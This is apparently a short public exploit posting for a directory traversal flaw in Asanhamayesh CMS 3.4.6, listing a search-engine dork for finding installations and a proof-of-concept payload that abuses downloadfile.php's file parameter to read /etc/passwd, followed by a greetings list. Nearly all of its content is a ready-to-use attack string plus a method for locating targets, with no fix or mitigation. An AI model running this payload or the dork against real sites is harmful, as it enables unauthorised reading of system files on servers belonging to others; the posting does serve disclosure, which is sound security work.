=================================================================================================
| # Title     : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability                        |
| # Author    : indoushka                                                                       |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)         |
| # Dork      : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6     |
=================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd

[+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd


====Greetings to :===================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
=====================================================================================================================================